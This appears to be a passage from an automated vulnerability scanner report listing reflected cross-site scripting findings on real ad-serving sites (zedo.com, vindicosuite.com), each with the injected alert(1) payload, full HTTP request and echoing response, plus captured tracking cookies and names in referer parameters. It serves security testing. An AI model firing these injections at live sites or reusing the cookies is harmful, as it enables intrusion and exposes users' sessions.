User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69771

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b" />
...[SNIP]...

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14989'%3balert(1)//2a3dc6422b2 was submitted in the $ parameter. This input was echoed as 14989';alert(1)//2a3dc6422b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=14989'%3balert(1)//2a3dc6422b2&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:14989';alert(1)//2a3dc6422b2;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',14989';alert(1)//2a3dc6422b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,14989';alert(1)//2a3dc6422b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e66f0"%3balert(1)//c0290daf8fd was submitted in the $ parameter. This input was echoed as e66f0";alert(1)//c0290daf8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=e66f0"%3balert(1)//c0290daf8fd&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:e66f0";alert(1)//c0290daf8fd;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',e66f0";alert(1)//c0290daf8fd';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,e66f0";alert(1)//c0290daf8fd;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aacb'%3balert(1)//355b6461f7f was submitted in the l parameter. This input was echoed as 8aacb';alert(1)//355b6461f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D8aacb'%3balert(1)//355b6461f7f&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4217

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...
ADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=8aacb';alert(1)//355b6461f7f" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250>
...[SNIP]...

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b04'%3balert(1)//36d8d5a78d7 was submitted in the q parameter. This input was echoed as c0b04';alert(1)//36d8d5a78d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=c0b04'%3balert(1)//36d8d5a78d7&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:25 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='c0b04';alert(1)//36d8d5a78d7';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c0b04';alert(1)//36d8d5a78d7;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b86"%3balert(1)//7be31572be0 was submitted in the q parameter. This input was echoed as f9b86";alert(1)//7be31572be0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=f9b86"%3balert(1)//7be31572be0&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='f9b86";alert(1)//7be31572be0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f9b86";alert(1)//7be31572be0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the adRotationId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d7d"><script>alert(1)</script>1b977e7ff4d was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:35 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

